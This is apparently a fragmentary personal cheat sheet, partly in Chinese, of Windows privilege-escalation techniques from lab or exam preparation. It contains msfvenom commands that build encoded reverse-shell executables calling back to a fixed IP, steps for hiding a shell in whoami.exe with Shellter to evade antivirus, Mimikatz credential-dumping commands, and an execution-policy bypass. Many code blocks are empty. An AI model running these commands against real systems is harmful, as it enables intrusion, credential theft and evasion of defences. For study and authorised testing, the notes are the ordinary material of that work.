Juicy Potato (abusing the golden privileges)
Process creation mode depending on the impersonated user’s privileges you can choose from:
CreateProcessWithToken
(needsSeImpersonate
)CreateProcessAsUser
(needsSeAssignPrimaryToken
)both
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato
https://github.com/ohpe/juicy-potato/releases/tag/v0.1
CLSID
JuicyPotato
1 |
|
Rough Potato
https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
FTP
Cannot execute in DOS Mode.
1
ftp> binary
Reverse shell
msfvenom
1
2
3msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe
Download by powershell
1 |
|
Default port: 3389
1 |
|
- With credentials
1 |
|
Windows script
msfvenom Reverse 腳本
1 |
|
shellter :把腳本寫進 PE 檔,躲防毒 (80 port)
1
sudo shelter
- 把
reverse_shell.bin
塞進whoami.exe
1
cp /usr/share/windows-resources/binaries/whoami.exe .
- 有地方能寫,就貼近去(O
- 把
撿 Reverse shell
1 |
|
- 把 poultryadmin 的密碼改成
OffSecHax1!
1 |
|
Mimikatz
show password
1
vault::cred
Dump credential
1
2
3sekurlsa::msv
sekurlsa::logonPasswords
lsadump::samCheck privilege
1
privilege::debug
Privesc check
Bypass Execution-Policy
1
Set-ExecutionPolicy Bypass -Scope process -Force
Execute
.ps1
1
. .\PrivescCheck.ps1; Invoke-PrivescCheck